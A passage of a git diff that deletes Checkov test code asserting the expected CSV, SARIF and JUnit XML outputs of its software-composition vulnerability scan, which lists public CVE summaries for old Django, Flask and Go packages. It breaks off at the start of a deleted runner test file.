-        'django,1.2,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2016-6186,MEDIUM,"Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function in contrib/admin/static/admin/js/admin/RelatedObjectLookups.js in Django before 1.8.14, 1.9.x before 1.9.8, and 1.10.x before 1.10rc1 allows remote attackers to inject arbitrary web script or HTML via vectors involving unsafe usage of Element.innerHTML.",OSI_BDS,1.8.14,,,',
-        'django,1.2,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2016-7401,HIGH,"The cookie parsing code in Django before 1.8.15 and 1.9.x before 1.9.10, when used on a site with Google Analytics, allows remote attackers to bypass an intended CSRF protection mechanism by setting arbitrary cookies.",OSI_BDS,1.8.15,,,',
-        'django,1.2,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2021-33203,MEDIUM,"Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories.",OSI_BDS,2.2.24,,,',
-        'flask,0.6,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2019-1010083,HIGH,The Pallets Project Flask before 1.0 is affected by: unexpected memory usage. The impact is: denial of service. The attack vector is: crafted encoded JSON data. The fixed version is: 1. NOTE: this may overlap CVE-2018-1000656.,"OSI_APACHE, DUMMY_OTHER_LICENSE",1.0,,,',
-        'flask,0.6,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2018-1000656,HIGH,The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vulnerability appears to have been fixed in 0.12.3. NOTE: this may overlap CVE-2019-1010083.,"OSI_APACHE, DUMMY_OTHER_LICENSE",0.12.3,,,',
-        'golang.org/x/crypto,v0.0.1,/path/to/go.sum,,acme,bridgecrewio/example,CVE-2020-29652,HIGH,A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.3 for Go allows remote attackers to cause a denial of service against SSH servers.,Unknown,0.0.2,,,',
-        'github.com/dgrijalva/jwt-go,v3.2.0,/path/to/go.sum,,acme,bridgecrewio/example,CVE-2020-26160,HIGH,"jwt-go before 4.0.0-preview1 allows attackers to bypass intended access restrictions in situations with []string{} for m[\\""aud\\""] (which is allowed by the specification). Because the type assertion fails, \\""\\"" is the value of aud. This is a security problem if the JWT token is presented to a service that lacks its own audience check.",Unknown,4.0.0rc1,,,',
-        'github.com/miekg/dns,v1.1.41,/path/to/go.sum,,acme,bridgecrewio/example,,,,Unknown,N/A,,,',
-        'github.com/prometheus/client_model,v0.0.0-20190129233127-fd36f4220a90,/path/to/go.sum,,acme,bridgecrewio/example,,,,Unknown,N/A,,,',
-        'requests,2.26.0,/path/to/requirements.txt,,acme,bridgecrewio/example,,,,OSI_APACHE,N/A,,,',
-        'requests,2.26.0,/path/to/sub/requirements.txt,,acme,bridgecrewio/example,,,,OSI_APACHE,N/A,,,', '']
-    csv_output_as_list = csv_output.split("\n")
-    assert csv_output_as_list == expected_csv_output
-
-    expected_csv_output_str = [
-        'Package,Version,Path,Line(s),Git Org,Git Repository,Vulnerability,Severity,Description,Licenses,Fix Version,Registry URL,Root Package,Root Version',
-        '"django",1.2,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2019-19844,CRITICAL,"Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user\\\'s email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. (One mitigation in the new releases is to send password reset tokens only to the registered user email address.)","OSI_BDS",1.11.27,,,',
-        '"django",1.2,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2016-6186,MEDIUM,"Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function in contrib/admin/static/admin/js/admin/RelatedObjectLookups.js in Django before 1.8.14, 1.9.x before 1.9.8, and 1.10.x before 1.10rc1 allows remote attackers to inject arbitrary web script or HTML via vectors involving unsafe usage of Element.innerHTML.","OSI_BDS",1.8.14,,,',
-        '"django",1.2,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2016-7401,HIGH,"The cookie parsing code in Django before 1.8.15 and 1.9.x before 1.9.10, when used on a site with Google Analytics, allows remote attackers to bypass an intended CSRF protection mechanism by setting arbitrary cookies.","OSI_BDS",1.8.15,,,',
-        '"django",1.2,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2021-33203,MEDIUM,"Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories.","OSI_BDS",2.2.24,,,',
-        '"flask",0.6,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2019-1010083,HIGH,"The Pallets Project Flask before 1.0 is affected by: unexpected memory usage. The impact is: denial of service. The attack vector is: crafted encoded JSON data. The fixed version is: 1. NOTE: this may overlap CVE-2018-1000656.","OSI_APACHE, DUMMY_OTHER_LICENSE",1.0,,,',
-        '"flask",0.6,/path/to/requirements.txt,,acme,bridgecrewio/example,CVE-2018-1000656,HIGH,"The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vulnerability appears to have been fixed in 0.12.3. NOTE: this may overlap CVE-2019-1010083.","OSI_APACHE, DUMMY_OTHER_LICENSE",0.12.3,,,',
-        '"golang.org/x/crypto",v0.0.1,/path/to/go.sum,,acme,bridgecrewio/example,CVE-2020-29652,HIGH,"A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.3 for Go allows remote attackers to cause a denial of service against SSH servers.","Unknown",0.0.2,,,',
-        '"github.com/dgrijalva/jwt-go",v3.2.0,/path/to/go.sum,,acme,bridgecrewio/example,CVE-2020-26160,HIGH,"jwt-go before 4.0.0-preview1 allows attackers to bypass intended access restrictions in situations with []string{} for m[\\"aud\\"] (which is allowed by the specification). Because the type assertion fails, \\"\\" is the value of aud. This is a security problem if the JWT token is presented to a service that lacks its own audience check.","Unknown",4.0.0rc1,,,',
-        '"github.com/miekg/dns",v1.1.41,/path/to/go.sum,,acme,bridgecrewio/example,,,"","Unknown",N/A,,,',
-        '"github.com/prometheus/client_model",v0.0.0-20190129233127-fd36f4220a90,/path/to/go.sum,,acme,bridgecrewio/example,,,"","Unknown",N/A,,,',
-        '"requests",2.26.0,/path/to/requirements.txt,,acme,bridgecrewio/example,,,"","OSI_APACHE",N/A,,,',
-        '"requests",2.26.0,/path/to/sub/requirements.txt,,acme,bridgecrewio/example,,,"","OSI_APACHE",N/A,,,', '']
-    csv_output_str_as_list = csv_output_str.split("\n")
-    assert csv_output_str_as_list == expected_csv_output_str
-
-
-def test_sarif_output(sca_package_report_with_skip_scope_function):
-    # The creation of sarif_json may change the input report. in order not to affect the other tests, we use
-    # a report that is unique for the scope of the function
-
-    # when
-    sarif_output = Sarif(reports=[sca_package_report_with_skip_scope_function], tool="Checkov").json
-
-    # then
-    sarif_output["runs"][0]["tool"]["driver"]["version"] = "2.0.x"
-    assert sarif_output == {
-        "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Schemata/sarif-schema-2.1.0.json",
-        "version": "2.1.0",
-        "runs": [
-            {
-                "tool": {
-                    "driver": {
-                        "name": "Checkov",
-                        "version": "2.0.x",
-                        "informationUri": "https://checkov.io",
-                        "rules": [
-                            {
-                                "id": "DUMMY_OTHER_LICENSE_flask@0.6",
-                                "name": "License DUMMY_OTHER_LICENSE - flask: 0.6",
-                                "shortDescription": {"text": "License DUMMY_OTHER_LICENSE - flask: 0.6"},
-                                "fullDescription": {"text": "Package flask@0.6 has license DUMMY_OTHER_LICENSE"},
-                                "help": {"text": "SCA license\nResource: path/to/requirements.txt.flask"},
-                                "defaultConfiguration": {"level": "error"},
-                            },
-                            {
-                                "id": "CVE-2019-19844_django@1.2",
-                                "name": "CVE-2019-19844 - django: 1.2",
-                                "shortDescription": {"text": "CVE-2019-19844 - django: 1.2"},
-                                "fullDescription": {
-                                    "text": "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user\\'s email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. (One mitigation in the new releases is to send password reset tokens only to the registered user email address.)"
-                                },
-                                "help": {
-                                    "text": "SCA package scan\nResource: path/to/requirements.txt.django\nStatus: fixed in 3.0.1, 2.2.9, 1.11.27"
-                                },
-                                "defaultConfiguration": {"level": "error"},
-                                "properties": {"security-severity": "9.8"},
-                                "helpUri": "https://nvd.nist.gov/vuln/detail/CVE-2019-19844",
-                            },
-                            {
-                                "id": "CVE-2016-6186_django@1.2",
-                                "name": "CVE-2016-6186 - django: 1.2",
-                                "shortDescription": {"text": "CVE-2016-6186 - django: 1.2"},
-                                "fullDescription": {
-                                    "text": "Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function in contrib/admin/static/admin/js/admin/RelatedObjectLookups.js in Django before 1.8.14, 1.9.x before 1.9.8, and 1.10.x before 1.10rc1 allows remote attackers to inject arbitrary web script or HTML via vectors involving unsafe usage of Element.innerHTML."
-                                },
-                                "help": {
-                                    "text": "SCA package scan\nResource: path/to/requirements.txt.django\nStatus: fixed in 1.9.8, 1.8.14"
-                                },
-                                "defaultConfiguration": {"level": "error"},
-                                "properties": {"security-severity": "6.1"},
-                                "helpUri": "https://nvd.nist.gov/vuln/detail/CVE-2016-6186",
-                            },
-                            {
-                                "id": "CVE-2016-7401_django@1.2",
-                                "name": "CVE-2016-7401 - django: 1.2",
-                                "shortDescription": {"text": "CVE-2016-7401 - django: 1.2"},
-                                "fullDescription": {
-                                    "text": "The cookie parsing code in Django before 1.8.15 and 1.9.x before 1.9.10, when used on a site with Google Analytics, allows remote attackers to bypass an intended CSRF protection mechanism by setting arbitrary cookies."
-                                },
-                                "help": {
-                                    "text": "SCA package scan\nResource: path/to/requirements.txt.django\nStatus: fixed in 1.9.10, 1.8.15"
-                                },
-                                "defaultConfiguration": {"level": "error"},
-                                "properties": {"security-severity": "7.5"},
-                                "helpUri": "https://nvd.nist.gov/vuln/detail/CVE-2016-7401",
-                            },
-                            {
-                                "id": "CVE-2021-33203_django@1.2",
-                                "name": "CVE-2021-33203 - django: 1.2",
-                                "shortDescription": {"text": "CVE-2021-33203 - django: 1.2"},
-                                "fullDescription": {
-                                    "text": "Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories."
-                                },
-                                "help": {
-                                    "text": "SCA package scan\nResource: path/to/requirements.txt.django\nStatus: fixed in 3.2.4, 3.1.12, 2.2.24"
-                                },
-                                "defaultConfiguration": {"level": "error"},
-                                "properties": {"security-severity": "4.9"},
-                                "helpUri": "https://nvd.nist.gov/vuln/detail/CVE-2021-33203",
-                            },
-                            {
-                                "id": "CVE-2019-1010083_flask@0.6",
-                                "name": "CVE-2019-1010083 - flask: 0.6",
-                                "shortDescription": {"text": "CVE-2019-1010083 - flask: 0.6"},
-                                "fullDescription": {
-                                    "text": "The Pallets Project Flask before 1.0 is affected by: unexpected memory usage. The impact is: denial of service. The attack vector is: crafted encoded JSON data. The fixed version is: 1. NOTE: this may overlap CVE-2018-1000656."
-                                },
-                                "help": {
-                                    "text": "SCA package scan\nResource: path/to/requirements.txt.flask\nStatus: fixed in 1.0"
-                                },
-                                "defaultConfiguration": {"level": "error"},
-                                "properties": {"security-severity": "7.5"},
-                                "helpUri": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010083",
-                            },
-                            {
-                                "id": "CVE-2018-1000656_flask@0.6",
-                                "name": "CVE-2018-1000656 - flask: 0.6",
-                                "shortDescription": {"text": "CVE-2018-1000656 - flask: 0.6"},
-                                "fullDescription": {
-                                    "text": "The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vulnerability appears to have been fixed in 0.12.3. NOTE: this may overlap CVE-2019-1010083."
-                                },
-                                "help": {
-                                    "text": "SCA package scan\nResource: path/to/requirements.txt.flask\nStatus: fixed in 0.12.3"
-                                },
-                                "defaultConfiguration": {"level": "error"},
-                                "properties": {"security-severity": "7.5"},
-                                "helpUri": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000656",
-                            },
-                            {
-                                "id": "CVE-2020-26160_github.com/dgrijalva/jwt-go@v3.2.0",
-                                "name": "CVE-2020-26160 - github.com/dgrijalva/jwt-go: v3.2.0",
-                                "shortDescription": {"text": "CVE-2020-26160 - github.com/dgrijalva/jwt-go: v3.2.0"},
-                                "fullDescription": {
-                                    "text": 'jwt-go before 4.0.0-preview1 allows attackers to bypass intended access restrictions in situations with []string{} for m[\\"aud\\"] (which is allowed by the specification). Because the type assertion fails, \\"\\" is the value of aud. This is a security problem if the JWT token is presented to a service that lacks its own audience check.'
-                                },
-                                "help": {
-                                    "text": "SCA package scan\nResource: path/to/go.sum.github.com/dgrijalva/jwt-go\nStatus: fixed in v4.0.0-preview1"
-                                },
-                                "defaultConfiguration": {"level": "error"},
-                                "properties": {"security-severity": "7.7"},
-                                "helpUri": "https://nvd.nist.gov/vuln/detail/CVE-2020-26160",
-                            },
-                            {
-                                "id": "CVE-2020-29652_golang.org/x/crypto@v0.0.1",
-                                "name": "CVE-2020-29652 - golang.org/x/crypto: v0.0.1",
-                                "shortDescription": {"text": "CVE-2020-29652 - golang.org/x/crypto: v0.0.1"},
-                                "fullDescription": {
-                                    "text": "A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.3 for Go allows remote attackers to cause a denial of service against SSH servers."
-                                },
-                                "help": {
-                                    "text": "SCA package scan\nResource: path/to/go.sum.golang.org/x/crypto\nStatus: fixed in v0.0.2"
-                                },
-                                "defaultConfiguration": {"level": "error"},
-                                "properties": {"security-severity": "7.5"},
-                                "helpUri": "https://nvd.nist.gov/vuln/detail/CVE-2020-29652",
-                            },
-                        ],
-                        "organization": "bridgecrew",
-                    }
-                },
-                "results": [
-                    {
-                        "ruleId": "DUMMY_OTHER_LICENSE_flask@0.6",
-                        "ruleIndex": 0,
-                        "level": "error",
-                        "attachments": [],
-                        "message": {"text": "License DUMMY_OTHER_LICENSE - flask: 0.6"},
-                        "locations": [
-                            {
-                                "physicalLocation": {
-                                    "artifactLocation": {"uri": "path/to/requirements.txt"},
-                                    "region": {"startLine": 1, "endLine": 1, "snippet": {"text": "flask: 0.6"}},
-                                }
-                            }
-                        ],
-                    },
-                    {
-                        "ruleId": "CVE-2019-19844_django@1.2",
-                        "ruleIndex": 1,
-                        "level": "error",
-                        "attachments": [],
-                        "message": {"text": "CVE-2019-19844 - django: 1.2"},
-                        "locations": [
-                            {
-                                "physicalLocation": {
-                                    "artifactLocation": {"uri": "path/to/requirements.txt"},
-                                    "region": {"startLine": 1, "endLine": 1, "snippet": {"text": "django: 1.2"}},
-                                }
-                            }
-                        ],
-                    },
-                    {
-                        "ruleId": "CVE-2016-6186_django@1.2",
-                        "ruleIndex": 2,
-                        "level": "warning",
-                        "attachments": [],
-                        "message": {"text": "CVE-2016-6186 - django: 1.2"},
-                        "locations": [
-                            {
-                                "physicalLocation": {
-                                    "artifactLocation": {"uri": "path/to/requirements.txt"},
-                                    "region": {"startLine": 1, "endLine": 1, "snippet": {"text": "django: 1.2"}},
-                                }
-                            }
-                        ],
-                    },
-                    {
-                        "ruleId": "CVE-2016-7401_django@1.2",
-                        "ruleIndex": 3,
-                        "level": "error",
-                        "attachments": [],
-                        "message": {"text": "CVE-2016-7401 - django: 1.2"},
-                        "locations": [
-                            {
-                                "physicalLocation": {
-                                    "artifactLocation": {"uri": "path/to/requirements.txt"},
-                                    "region": {"startLine": 1, "endLine": 1, "snippet": {"text": "django: 1.2"}},
-                                }
-                            }
-                        ],
-                    },
-                    {
-                        "ruleId": "CVE-2021-33203_django@1.2",
-                        "ruleIndex": 4,
-                        "level": "warning",
-                        "attachments": [],
-                        "message": {"text": "CVE-2021-33203 - django: 1.2"},
-                        "locations": [
-                            {
-                                "physicalLocation": {
-                                    "artifactLocation": {"uri": "path/to/requirements.txt"},
-                                    "region": {"startLine": 1, "endLine": 1, "snippet": {"text": "django: 1.2"}},
-                                }
-                            }
-                        ],
-                    },
-                    {
-                        "ruleId": "CVE-2019-1010083_flask@0.6",
-                        "ruleIndex": 5,
-                        "level": "error",
-                        "attachments": [],
-                        "message": {"text": "CVE-2019-1010083 - flask: 0.6"},
-                        "locations": [
-                            {
-                                "physicalLocation": {
-                                    "artifactLocation": {"uri": "path/to/requirements.txt"},
-                                    "region": {"startLine": 1, "endLine": 1, "snippet": {"text": "flask: 0.6"}},
-                                }
-                            }
-                        ],
-                    },
-                    {
-                        "ruleId": "CVE-2018-1000656_flask@0.6",
-                        "ruleIndex": 6,
-                        "level": "error",
-                        "attachments": [],
-                        "message": {"text": "CVE-2018-1000656 - flask: 0.6"},
-                        "locations": [
-                            {
-                                "physicalLocation": {
-                                    "artifactLocation": {"uri": "path/to/requirements.txt"},
-                                    "region": {"startLine": 1, "endLine": 1, "snippet": {"text": "flask: 0.6"}},
-                                }
-                            }
-                        ],
-                    },
-                    {
-                        "ruleId": "CVE-2020-26160_github.com/dgrijalva/jwt-go@v3.2.0",
-                        "ruleIndex": 7,
-                        "level": "error",
-                        "attachments": [],
-                        "message": {"text": "CVE-2020-26160 - github.com/dgrijalva/jwt-go: v3.2.0"},
-                        "locations": [
-                            {
-                                "physicalLocation": {
-                                    "artifactLocation": {"uri": "path/to/go.sum"},
-                                    "region": {
-                                        "startLine": 1,
-                                        "endLine": 1,
-                                        "snippet": {"text": "github.com/dgrijalva/jwt-go: v3.2.0"},
-                                    },
-                                }
-                            }
-                        ],
-                    },
-                    {
-                        "ruleId": "CVE-2020-29652_golang.org/x/crypto@v0.0.1",
-                        "ruleIndex": 8,
-                        "level": "error",
-                        "attachments": [],
-                        "message": {"text": "CVE-2020-29652 - golang.org/x/crypto: v0.0.1"},
-                        "locations": [
-                            {
-                                "physicalLocation": {
-                                    "artifactLocation": {"uri": "path/to/go.sum"},
-                                    "region": {
-                                        "startLine": 1,
-                                        "endLine": 1,
-                                        "snippet": {"text": "golang.org/x/crypto: v0.0.1"},
-                                    },
-                                }
-                            }
-                        ],
-                        "suppressions": [{"kind": "external", "justification": "CVE-2020-29652 is skipped"}],
-                    },
-                ],
-            }
-        ],
-    }
-
-
-def test_get_junit_xml_string(sca_package_report_with_skip):
-    # given
-    report = sca_package_report_with_skip
-
-    # when
-    test_suites = [report.get_test_suite()]
-    junit_xml_output = report.get_junit_xml_string(test_suites)
-
-    # then
-    assert (
-            xml.dom.minidom.parseString(junit_xml_output).toprettyxml()
-            == xml.dom.minidom.parseString(
-        "".join(
-            [
-                '<?xml version="1.0" ?>\n',
-                '<testsuites disabled="0" errors="0" failures="7" tests="8" time="0.0">\n',
-                '\t<testsuite disabled="0" errors="0" failures="7" name="sca_package scan" skipped="1" tests="8" time="0">\n',
-                '\t\t<testcase name="[CRITICAL][CVE-2019-19844] django: 1.2" classname="/path/to/requirements.txt.django" file="/path/to/requirements.txt">\n',
-                '\t\t\t<failure type="failure" message="SCA package scan">\n',
-                "Description: Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user\\'s email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. (One mitigation in the new releases is to send password reset tokens only to the registered user email address.)\n",
-                "Link: https://nvd.nist.gov/vuln/detail/CVE-2019-19844\n",
-                "Published Date: 2019-12-18T20:15:00+01:00\n",
-                "Base Score: 9.8\n",
-                "Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n",
-                "Risk Factors: {'Severity': 'Critical', 'HasFix': True, 'DoS': False, 'AttackVector': 'network', 'AttackComplexity': 'low'}\n",
-                "Fix Details:\n",
-                "  Status: fixed in 3.0.1, 2.2.9, 1.11.27\n",
-                "  Fixed Version: 1.11.27\n",
-                "\n",
-                "Resource: path/to/requirements.txt.django\n",
-                "File: /path/to/requirements.txt: 0-0\n",
-                "\n",
-                "\t\t0 | django: 1.2</failure>\n",
-                "\t\t</testcase>\n",
-                '\t\t<testcase name="[MEDIUM][CVE-2016-6186] django: 1.2" classname="/path/to/requirements.txt.django" file="/path/to/requirements.txt">\n',
-                '\t\t\t<failure type="failure" message="SCA package scan">\n',
-                "Description: Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function in contrib/admin/static/admin/js/admin/RelatedObjectLookups.js in Django before 1.8.14, 1.9.x before 1.9.8, and 1.10.x before 1.10rc1 allows remote attackers to inject arbitrary web script or HTML via vectors involving unsafe usage of Element.innerHTML.\n",
-                "Link: https://nvd.nist.gov/vuln/detail/CVE-2016-6186\n",
-                "Published Date: 2016-08-05T17:59:00+02:00\n",
-                "Base Score: 6.1\n",
-                "Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n",
-                "Risk Factors: {'Severity': 'Medium', 'HasFix': True, 'DoS': False, 'AttackVector': 'network', 'AttackComplexity': 'low', 'Exploit exists': True}\n",
-                "Fix Details:\n"
-                "  Status: fixed in 1.9.8, 1.8.14\n",
-                "  Fixed Version: 1.8.14\n",
-                "\n",
-                "Resource: path/to/requirements.txt.django\n",
-                "File: /path/to/requirements.txt: 0-0\n",
-                "\n",
-                "\t\t0 | django: 1.2</failure>\n",
-                "\t\t</testcase>\n",
-                '\t\t<testcase name="[HIGH][CVE-2016-7401] django: 1.2" classname="/path/to/requirements.txt.django" file="/path/to/requirements.txt">\n',
-                '\t\t\t<failure type="failure" message="SCA package scan">\n',
-                "Description: The cookie parsing code in Django before 1.8.15 and 1.9.x before 1.9.10, when used on a site with Google Analytics, allows remote attackers to bypass an intended CSRF protection mechanism by setting arbitrary cookies.\n",
-                "Link: https://nvd.nist.gov/vuln/detail/CVE-2016-7401\n",
-                "Published Date: 2016-10-03T20:59:00+02:00\n",
-                "Base Score: 7.5\n",
-                "Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n",
-                "Risk Factors: {'Severity': 'High', 'HasFix': True, 'DoS': False, 'AttackVector': 'network', 'AttackComplexity': 'low'}\n",
-                "Fix Details:\n",
-                "  Status: fixed in 1.9.10, 1.8.15\n",
-                "  Fixed Version: 1.8.15\n",
-                "\n",
-                "Resource: path/to/requirements.txt.django\n",
-                "File: /path/to/requirements.txt: 0-0\n",
-                "\n",
-                "\t\t0 | django: 1.2</failure>\n",
-                "\t\t</testcase>\n",
-                '\t\t<testcase name="[MEDIUM][CVE-2021-33203] django: 1.2" classname="/path/to/requirements.txt.django" file="/path/to/requirements.txt">\n',
-                '\t\t\t<failure type="failure" message="SCA package scan">\n',
-                "Description: Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories.\n",
-                "Link: https://nvd.nist.gov/vuln/detail/CVE-2021-33203\n",
-                "Published Date: 2021-06-08T20:15:00+02:00\n",
-                "Base Score: 4.9\n",
-                "Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N\n",
-                "Risk Factors: {'Severity': 'High', 'HasFix': True, 'DoS': False, 'AttackVector': 'network', 'AttackComplexity': 'low'}\n",
-                "Fix Details:\n"
-                "  Status: fixed in 3.2.4, 3.1.12, 2.2.24\n",
-                "  Fixed Version: 2.2.24\n",
-                "\n",
-                "Resource: path/to/requirements.txt.django\n",
-                "File: /path/to/requirements.txt: 0-0\n",
-                "\n",
-                "\t\t0 | django: 1.2</failure>\n",
-                "\t\t</testcase>\n",
-                '\t\t<testcase name="[HIGH][CVE-2019-1010083] flask: 0.6" classname="/path/to/requirements.txt.flask" file="/path/to/requirements.txt">\n',
-                '\t\t\t<failure type="failure" message="SCA package scan">\n',
-                "Description: The Pallets Project Flask before 1.0 is affected by: unexpected memory usage. The impact is: denial of service. The attack vector is: crafted encoded JSON data. The fixed version is: 1. NOTE: this may overlap CVE-2018-1000656.\n",
-                "Link: https://nvd.nist.gov/vuln/detail/CVE-2019-1010083\n",
-                "Published Date: 2019-07-17T16:15:00+02:00\n",
-                "Base Score: 7.5\n",
-                "Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n",
-                "Risk Factors: {'Severity': 'High', 'HasFix': True, 'DoS': True, 'AttackVector': 'network', 'AttackComplexity': 'low'}\n",
-                "Fix Details:\n"
-                "  Status: fixed in 1.0\n",
-                "  Fixed Version: 1.0\n",
-                "\n",
-                "Resource: path/to/requirements.txt.flask\n",
-                "File: /path/to/requirements.txt: 0-0\n",
-                "\n",
-                "\t\t0 | flask: 0.6</failure>\n",
-                "\t\t</testcase>\n",
-                '\t\t<testcase name="[HIGH][CVE-2018-1000656] flask: 0.6" classname="/path/to/requirements.txt.flask" file="/path/to/requirements.txt">\n',
-                '\t\t\t<failure type="failure" message="SCA package scan">\n',
-                "Description: The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vulnerability appears to have been fixed in 0.12.3. NOTE: this may overlap CVE-2019-1010083.\n",
-                "Link: https://nvd.nist.gov/vuln/detail/CVE-2018-1000656\n",
-                "Published Date: 2018-08-20T21:31:00+02:00\n",
-                "Base Score: 7.5\n",
-                "Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n",
-                "Risk Factors: {'Severity': 'High', 'HasFix': True, 'DoS': True, 'AttackVector': 'network', 'AttackComplexity': 'low'}\n",
-                "Fix Details:\n"
-                "  Status: fixed in 0.12.3\n"
-                "  Fixed Version: 0.12.3\n"
-                "\n",
-                "Resource: path/to/requirements.txt.flask\n",
-                "File: /path/to/requirements.txt: 0-0\n",
-                "\n",
-                "\t\t0 | flask: 0.6</failure>\n",
-                "\t\t</testcase>\n",
-                '\t\t<testcase name="[HIGH][CVE-2020-26160] github.com/dgrijalva/jwt-go: v3.2.0" classname="/path/to/go.sum.github.com/dgrijalva/jwt-go" file="/path/to/go.sum">\n',
-                '\t\t\t<failure type="failure" message="SCA package scan">\n',
-                "Description: jwt-go before 4.0.0-preview1 allows attackers to bypass intended access restrictions in situations with []string{} for m[\\&quot;aud\\&quot;] (which is allowed by the specification). Because the type assertion fails, \\&quot;\\&quot; is the value of aud. This is a security problem if the JWT token is presented to a service that lacks its own audience check.\n",
-                "Link: https://nvd.nist.gov/vuln/detail/CVE-2020-26160\n",
-                "Published Date: 2020-09-30T20:15:00+02:00\n",
-                "Base Score: 7.7\n",
-                "Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n",
-                "Risk Factors: {'Severity': 'High', 'HasFix': True, 'DoS': True, 'AttackVector': 'network', 'AttackComplexity': 'low'}\n",
-                "Fix Details:\n"
-                "  Status: fixed in v4.0.0-preview1\n",
-                "  Fixed Version: 4.0.0rc1\n",
-                "\n",
-                "Resource: path/to/go.sum.github.com/dgrijalva/jwt-go\n",
-                "File: /path/to/go.sum: 0-0\n",
-                "\n",
-                "\t\t0 | github.com/dgrijalva/jwt-go: v3.2.0</failure>\n",
-                "\t\t</testcase>\n",
-                '\t\t<testcase name="[HIGH][CVE-2020-29652] golang.org/x/crypto: v0.0.1" classname="/path/to/go.sum.golang.org/x/crypto" file="/path/to/go.sum">\n',
-                '\t\t\t<skipped type="skipped" message="CVE-2020-29652 skipped for golang.org/x/crypto: v0.0.1"/>\n',
-                "\t\t</testcase>\n",
-                "\t</testsuite>\n",
-                "</testsuites>\n",
-            ]
-        )
-    ).toprettyxml()
-    )
diff --git a/tests/sca_package/test_runner.py b/tests/sca_package/test_runner.py
deleted file mode 100644
index 7757fa28d36..00000000000
--- a/tests/sca_package/test_runner.py
+++ /dev/null
@@ -1,302 +0,0 @@
-from pathlib import Path
-from unittest.mock import MagicMock
-
-from packaging import version as packaging_version
-from pytest_mock import MockerFixture
-
-from checkov.common.bridgecrew.check_type import CheckType
-from checkov.common.bridgecrew.code_categories import CodeCategoryType
-from checkov.common.bridgecrew.platform_integration import bc_integration
-from checkov.common.bridgecrew.severities import Severities, BcSeverities
-from checkov.common.models.enums import CheckResult
-from checkov.runner_filter import RunnerFilter
-from checkov.sca_package.runner import Runner
-
-EXAMPLES_DIR = Path(__file__).parent / "examples"
-
-
-def test_run(sca_package_report):
-    # given
-    report = sca_package_report
-    # then
-    assert report.check_type == "sca_package"
-
-    assert report.resources == {
-        "path/to/go.sum.github.com/dgrijalva/jwt-go",
-        "path/to/go.sum.golang.org/x/crypto",
